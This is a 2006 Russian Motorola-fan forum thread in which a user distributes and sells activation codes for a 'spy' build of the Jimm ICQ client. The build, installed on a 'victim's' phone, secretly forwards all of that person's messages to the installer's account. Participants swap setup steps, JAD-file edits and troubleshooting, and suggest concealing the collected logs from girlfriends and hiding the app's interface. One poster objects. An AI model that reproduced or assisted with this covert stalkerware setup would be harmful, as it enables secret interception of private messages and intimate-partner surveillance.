MotoFan.Ru — всё для Motorola > Лаборатория > Разработка Java-приложений > Jimm

Jimm - Шпионская Версия ! Полная версия
Страницы: 1, 2, 3, 4

 no av DjSens

 8.9.2006, 22:55

ВНИМАНИЕ!
Данная модификация сделана с нарушением лицензии GPL,
поэтому её использование небезопасно для пользователей.


итак шпионский мод джимма можно скачать по адресу: www.jimms.ucoz.ru и www.jimms.wen.r u
"Данная модификация сделана с нарушением лицензии GPL,
поэтому её использование небезопасно для пользователей."

ИНСТРУКЦИИ:
1. Ставим жертве НА СОТИК УДАЛИВ СТАРЫЕ ДЖИММЫ!
2. Когда жертва запустит этот джимм отправляем ей без кавычек "+NNNNNN" где NNNNNN - это ваш номер аськи (туда джимм будет дублировать всю переписку жертвы)
3. Чуток пошпионив джимм перестанет шпионить. А чтобы не переставал нужно послать жертве на этот джимм особое число из 6 цифр (код активации). Без этого кода джимм превратится в обычный джимм.
4. Кому нужен код - стучите в аську 4086226. У кого рейтинг на мотофане 30 или выше - тем я сразу пришлю код )))
Разговаривать с остальными у меня нет времени. Но моё время можно купить - за 150 р. Вырученные средства пойдут на дальнейшие разработки.

Инструкции_для_кода:
Код включает шпионаж в полноценном режиме - без тестовых пробных запусков.
Код привязан будет к номеру твоей аськи - назовём твой номер аськи UIN1.
На UIN1 и будут идти копии сообщений
Код слать без плюса жертве когда она сидит с моего шпионского джимма.
Код слать ТОЛЬКО с номера UIN1
Жертва код не увидит
Код не изменится если выйдет новая версия шпиона
Число жертв любое
Код нельзя комунить подарить - т.к. если послать его с любого номера кроме UIN1 то он не сработает.

 no av ArtDenis

 10.9.2006, 6:47

Я категорически против всяких версий с "жучками". Неужели вам всем не хватило истории с джиммом от ворона и пропажей коротких аськовских номеров?
А всем, озабоченным поведением своих вторых половинок, могу посоветовать получше выбирать себе друзей/подруг или в тяжёлых случаях обратиться к психологу :)

 no av DjSens

 10.9.2006, 12:39

ArtDenis, хорош оффтопик гнать, я не предлагаю на ТВОЙ сотик поставить мой спай-джимм. Причины могуть быть самые разные для того чтобы иметь такую прогу. Я бы её кроме всего прочего стал бы юзать для "переноса" СВОЕЙ переписки на комп.
Когда у меня друзья спрашивают порнуху - я не читаю им лекцию о вредьбе рукоблудства - а просто даю им диски. Надо, значит надо.

 av plandex

 11.9.2006, 18:49

в принципе чувак прав. проект вроде опенсорсный

 av Freemmy

 22.10.2006, 12:57

DjSens, хз, по идее вроде реально, забить в джим чтобы он отслеживал все сообщения и отправлял их на твой номер аськи. думаю можно дописать его чтоб он это делал. нужен ява кодер, а я в этом так же как и ты нолик.
хотя методом научного тыка можно и самим попробовать....

 no av DjSens

 13.11.2006, 6:19

Тестирую...
вчера я весь вечер и всю ночь с такого Джимма сидел - сёдня с компа запустил номер аськи, куда должно было всё прийти - а там тока первые 3 сообщения... :(
Может сервер аськи решил что я спамер и перестал пересылать мессаджи на тот номер ? И стёр все кроме первых трёх ?
Буду пробовать дальше :)
Неужели придётся постоянно этот номер в онлайне держать ?

 av Kepa

 13.11.2006, 9:42

DjSens,
а мне ваще ничего не пришло.....
Сделал все как ты мне написал....и тю-тю сообщения...

 no av Simpleton

 13.11.2006, 21:11

К сожалению, пацаны правы - мне только 12 сообщений пришло... Хотя должно было гораздо больше. Так что по-любому, вместо тормозящей истории эту фишку использовать нельзя. Номер должен быть в онлайне постоянно... Жаль.

 no av DjSens

 14.11.2006, 7:09

вопщем выяснили - номер куда дублируются сообщения должен быть в онлайне...
в итоге получаем что нужен бот, который буде собирать логи переписки и скидывать их ежесуточно мэйлом на ваш ящик

ещё предложения будут ? :)

 no av DjSens

 14.11.2006, 9:16

только НЕ ЗАПУСКАЙТЕ шпионский Джимм с UIN номером N если пересылка копий сообщений настроена на тот же номер N - а то Джимм зациклится (наверно).

Джимм должен логинится с одного номера, а копии пересылатся НА ДРУГОЙ !!!

 av Kepa

 14.11.2006, 10:54

Цитата(DjSens @ Понедельник, 13 Ноября 2006, 18:30)
ты через JAD файл ставил ?    исправил там строчку BackColor на число минус UIN ?
*



Конечно......все сделал что надо было!!!!

 no av DjSens

 14.11.2006, 11:08

Kepa, у всех работает - а у тя не работает... чё то не так делаешь...
выбери UIN (номер1) , пересчитай по инструкции, запиши его в JAD файл, залогинься с ДРУГОГО UIN`a и пошли пару сообщений друзьям.
Потом с компа, или из НОРМАЛЬНОГО (НЕ шпионского) Джимма залогинься с UIN`a номер 1 и посмотри чё придёт.

Шпионский Джимм НЕЛЬЗЯ логинить с того же номера куда дубли сообщений отправляются.

 no av Simpleton

 14.11.2006, 13:23

Кстати, такая идея тем, кто с ботами, которые в онлайн постоянно, заморачиваться не хочет, или не может. У меня, к примеру, в онлайне всегда джимм, а не компутерная аська, но если в spy-версии ставить переадресация на свой UIN, то в хистори того, за кем шпионишь, такая каша получается, просто пипец. Поэтому сливаем MultiTim'ом два джимма - первый, которым и пользуемся, нормальный, со смайлами, звуками и красивыми иконками, и второй, на который приходят сообщения со spy-jimm, с одним модулем history и выковыряв из него все звуки и иконки (чтобы места меньше занимал:-). Вот и получается, что мы одновременно онлайн на двух UIN'ах. Единственная трабла - историю в файл этот комбайн сохранять не хочет:-( Ну и еще надо следить за переполнением истории и чаты тереть, чтобы хип не переполнился.

 no av DjSens

 14.11.2006, 13:59

Тогда лучше так сделать:
Spy-Jimm оставить как есть - его мы ставим тому, чью переписку воруем. Он допустим работает на UIN`e = N1. И каждое сообщение помечает спецсимволом в начале.

И нужно ещё сделать спец Джимм который получая сообщения с номера N1 будет их складывать в файлик, не выводя в чат и не оповещая об их приходе (это касается только сообщений, помеченных спецсимволом) - чтобы ваша подруга взяв ваш сотик, пока вы отлучились в туалет, не просекла что к чему).

Остаётся тока придумать как этот файлик просматривать... - например сделать программульку, которая после ввода пароля (защита от той же подруги) позволит вам посмотреть лог переписки, скинутый в этот файлик.
Ну и ещё, если будет работать ПЕРЕДАЧА ФАЙЛОВ - то этот файлик можно будет на комп кидать себе.

Тогда пока вы в онлайне в Джимме - всё протоколируется, пока на компе - тоже всё записывается.
Терятся сообщения будут тока если вы долго в оффлайне...
(я попробовал ровно 50 коротеньких сообщений в оффлайн послать - пришло потом только 36...)

 no av Simpleton

 14.11.2006, 17:10

DjSens, конечно, лучше сделать так, как ты сказал:-) до сих пор на моторах джимм сразу историю в файл не пишет, хотя столько разговоров, что при переполнении истории он падать и глючить начинает,но вот то ли никто не занимается этим никто, то ли сложно это. Я вот слепил два джимма мультитаймом, может кому надо. Первый Jimm - офиц. 0.5.2 безмодульный - основной, и Ji - офиц. 0.5.1 с модулем истории и без звуков(сам удалил) - для Spy-Jimm. MIDlet-Data-Size поставил 102400, кому не надо, меняйте. С красивостями джимм не пошел. И в такой-то сборке хипа осталось только около 50. Вообще, кстати, может, за основу как раз сборку Мультитайма взять? просто второй джимм как-нибудь обрезать так, что при его запуске вылезало две строки - подключить и настройка. Так и подруга ничего не увидит, если что:-) А историю можно выдирать из rms на компе...

 no av DjSens

 15.11.2006, 5:57

Simpleton, а куды ж тут теперь UIN прописывать куда копии сообщений пересылать ? :)

 no av Simpleton

 15.11.2006, 13:40

DjSens, не, ты не понял, это ставить себе на мобилу:-) Подруге-Spy-Jimm. Себе-комбайн из двух джиммов. Один джимм - для нормального общения, там основной UIN. Второй - для накопления истории, в нем прописан UIN, на который присылает сообщения Spy-Jimm. Запускаешь оба, второй сворачивешь, и он в фоне спокойно работает, и пишет историю. Только время от времения чаты в обоих джиммах чистить надо, потому что хипа мало остается. Ну и как недостаток - в основном джимме без истории остаешься. И если подруга возьмет, может (случайно конечно) развернуть второй джимм и увидеть свою преписку:-(. Вот тут возникает идея - взять тот джимм, который пишет историю, и как-нибудь урезать его так, чтобы после запуска в меню были только две строчки - настройка и подключение. Ну то есть, чтобы список он не показывал совсем. Я в java полный нуль, поэтому не знаю, насколько это возможно.

 no av DjSens

 15.11.2006, 14:00

ААА! точно! тормознул я :) Думаю мы это сделаем с тем человеком, который по моей просьбе Jimm превратил в Spy-Jimm :)

 av gajer

 16.11.2006, 9:43

Simpleton , а не скажешь название проги которой ты склеивал джимы, или ещё лучше сылку на неё(нужно склеить шпиона и обычного джима), заранее спасибо :)

 no av Simpleton

 16.11.2006, 16:32

gajer, это целая тема Multime :: Midlet Manager Читай, разбирайся. из советов - чем меньше модулей в джимме, тем меньше хипа он кушает, ну и лого удали, хоть мелкий, но все равно хип занимает. С гордостью могу сказать, что пересобрав уже выложенную сборку, я свободного хипа аж 200кб получил (при запуске обоих жиммов), правда из второго джимма удалил и лэнгпак и все png'и...
Страницы: 1, 2, 3, 4

Полная версия:


MotoFan.ru (©) 2024    Слушать Radio